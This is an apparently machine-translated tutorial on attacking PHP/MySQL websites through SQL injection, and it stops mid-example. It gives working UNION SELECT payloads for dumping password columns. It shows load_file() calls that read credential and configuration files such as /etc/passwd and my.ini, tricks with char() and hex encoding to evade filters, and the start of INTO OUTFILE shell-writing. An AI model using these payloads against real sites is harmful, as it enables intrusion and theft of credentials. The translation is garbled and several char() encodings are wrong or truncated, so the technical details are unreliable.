PHP injection and anti-Injection

In this era of injection popularity, how many cainiao are using tools to charge around. if you don't want to be a slave of tools, you don't want to get out of the box if you don't want to meet PHP, and you don't want to continue working as a cainiao group, don't want ...... so please calm down and follow me through the whole process of intrusion detection. I believe you will surely gain something. not only in terms of technology, but also in terms of ideas and consciousness ..

Determine whether injection exists: first, PHP and ASP determine the injection method, and add and 1 = 1, and 1 = 2 after a dynamic connection to check the returned results. if the two returned results are different, an injection point is preliminarily identified.

Determine the field size: Next, we use the order by. syntax to deal with the php guess field:

Http: // 127.0.0.1/1.php? Id = 1 order by 40 // If the returned result is normal, it indicates that the actual field is larger than 40. Then we continue to add. always add to return error.

For example, when http: // 127.0.0.1/1.php? An error occurred when id = 1 order by 45, so we know that the field size is 44.

Union select: after knowing the field size, we will use the union select joint query to list all fields.

Http: // 127.0.0.1/1.php? Id = 1 and 1 = 2 union select 1, 2, 3, 4 ~ 44/* // here we listed 44 fields and told MYSQL that our command has been executed .*

You can replace the field name you want to query with the corresponding field name displayed in the display, and then the field content is displayed in the from statement. For example:

Http: // 127.0.0.1/1.php? Id = 1and 1 = 2 union select 1, 2, 3, 4 ,~ 30, passwd, 32 ,~ 45 from member /*//~ It indicates that it is omitted here. You cannot write it like this.

Several common MYSQL functions: Well, now we have listed all the fields. it is estimated that at this time someone should be eager to add from to guess the password. in fact, we should put the password on the back end. some people say that the functions of MYSQL are the same as those of ACCESS, or even worse. This is actually a misunderstanding, and I am wronged by MYSQL. let's take a look at the advanced use of MYSQL.
Here we first list several common Han numbers: 1: system_user () 2: user () 3: current_user4: session_user () 5: database () 6: version () 7: load_file ()...... their meanings are as follows:

1: system username. 2: username. 3: Current Username: 4 username for database connection. 5: database name. 6: database version. 7: Functions for MYSQL to read local files

What are their functions? 1-6 has the following functions:

The information returned by these functions plays an important role in the detection process. They have a great role in understanding our goals, analyzing our goals, finding vulnerabilities, and broadening our thinking. for example, you can understand the system version, whether the database supports union, and whether the current user is the ROOT user... function 7 plays a greater role. Let's talk about it separately.

This topic describes the functions and skills of the load_file () function.
OK. load_file is a function used by MYSQL to read local files. load_file has a huge effect when the permissions we inject can read and write files. how can we determine that we have the permission to inject points? It's easy to add and (select count (*) from mysql after the injection point. user)> 0/* If the returned result is normal, the read/write permission is granted. we can use this function to read sensitive system files, find configuration files, Database Connection Files, social engineering files, and WEB physical paths. next, I will summarize the sensitive file list:
WINDOWS:
Load_file (char (47,119,105,110,100,111,119,115, 47,112,104,112, 46,105,110,105,) c:/windows/php. ini // do you have to say anything in it?
Load_file (char (47,119,105,110,110,116, 47,112,104,112, 46,105,110,105,) c:/winnt/php. ini
Load_file (char (47,119,105,110,100,111,119,115, 47,109,121, 46,105,110,105,) c:/windows/my. ini // the password and user name are left when the Administrator logs on to MYSQL.
Load_file (char (47,119,105,110,110,116, 47,109,121, 46,105,110,105,) c:/winnt/my. ini
Load_file (char (111,111,116, 46,105,110,105,) c:/boot. ini

In LUNIX/UNIX:
Load_file (char (47,101,116, 115,115,119,111,114,100, 47,)/etc/password // do not need to be said?
Load_file (char (47,117,115,114, 47,108,111, 104,116,116,112,100, 111,

110,102, 47,104,116,116,112,100, 111,110,102 ))

/Usr/local/httpd/conf/httpd. conf // you may find the default website directory!
Load_file (char (47,117,115,114, 47,108,111, 97,112, 104,101, 99,111,110

, 104,116,116,112,100, 111,110,102 ))

/Usr/local/apache2/conf/httpd. conf // you may find the default website directory!
FreeBSD:
Load_file (char (47) // list the root directory of the FreeBSD system

Some friends may call it here. What is it? What is char? What is the next string? (If the system doesn't understand, you don't have to ask. GOOGLE is your choice ).
In fact, even if you have an injection point with read and write permissions, If you directly execute load_file (c: oot. ini). Generally, ECHO is not displayed. In this case, you have two options. 1. Convert the path to hexadecimal format and directly submit it to the database. 2. Convert the path to the 10-digit system and use the char () function to restore it back to ASCII.
For example, c: oot. ini: "0x633A5C626F6F742E696E69", you can directly use load_file (0x633A5C626F6F742E696E69. if it is converted to a 10-digit system, it means: "99 58 92 98 111 111 116 46 105 110 105 ". you need to use char () for conversion. before conversion, you need to make a batch replacement in the TXT file, convert all spaces. that is: load_file (char (111,111,116, 46,105,110,105 )). be sure not to omit the extension number, which is symmetric.
Speaking of this, it is estimated that there is another dish to be called... it's all done. Let's go there and execute it ?! Don't worry. Check it out.

You only need to place load_file () on the fields displayed on the page. It is best to ensure that there are enough places to display the files you want to display. I don't have enough positions and I'm not nervous. I will teach you a few more tricks.

1: Sometimes, you are sure you have the right to read and write files, but you cannot read the files, or a blank space. Why? The reason may be that the other party's system has done a good job in permission configuration. Your USER permission cannot read the files in the ADMINISTRATOR. both NTFS and LINUX can achieve this. if you want to exclude the above situations, do you have to consider whether the content you read has been executed by the browser as a scripting language for HTML, ASP, PHP, ASPX, JSP, and so on? For example, if the content you read contains <> and other symbols, the browser will execute your file content and you will naturally see nothing. it is also very easy to deal with such a situation. We only need to replace those special symbols with other symbols when reading them, so that the browser will not execute them! How to replace it? We have replace (load_file (A), char (B), char (C) functions in! When you read file A, if it contains letters or symbols B, MYSQL will replace B with letters or symbols C and then display it. OK. replace: replace (load_file (A), char (60), char (32 )). here, the CHAR () function is converted to a letter, that is, once the "<" symbol appears, it is replaced by a space. in this way, you can obtain the complete echo content.

2: The positions of all fields are not adequate for ECHO, and the files read are incomplete. What should I do? Here we use the Substring (str, pos, len) function to solve the problem. it means to return a substring of len characters from the position of the string 'str. for example, Substring (load_file (A), 50,100) is to display the 50th letters of the content of A to you. then we can perform a step-by-step echo.

Advanced use of into outfile!
OK. load_file () Let's talk about that much. Next, we have a lot to come! Here, I would like to talk about the next very important method of application, which is also part of my focus on the technology of several works of Jianxin. After we confirm the following conditions:
1. Obtain the physical path (into outfile physical path) to write to the directory.
2. union can be used (that is, MySQL 3 or a later version is required)
3. the other party does not filter '(because the conversion cannot be replaced by other functions after outfile)
4. MYSQL users have the file_priv permission (otherwise, they cannot write or read the file content)
5. systems that have write permissions on web directories generally have permissions for MS, but LINUX generally uses rwxr-xr-x, which means that the group and other users do not have the permission to write.

Here 1, we can generally rely on the database error information to pop up, if not, you can also get through load_file. 2. That's generally okay... 3 is also rare for filtering. 4. Do you have the permission? We have tested it before. 5. If we cannot back up the path to the website, we also have other methods, such as going to starup, run, and so on. generally, you can try uploading directories and image directories. Most of them have read and write permissions.
OK. the required conditions are determined. How can this problem be used? We separate the two parts for usage.

Usage 1: This is a regular usage. We all know that the website's message, upload, and other functions are used to get your sentence and then use it.

Http://www.tian6.com/coder.php? Id = 1 and 1 = 2 union select 1, load_file (/www/home/html/upl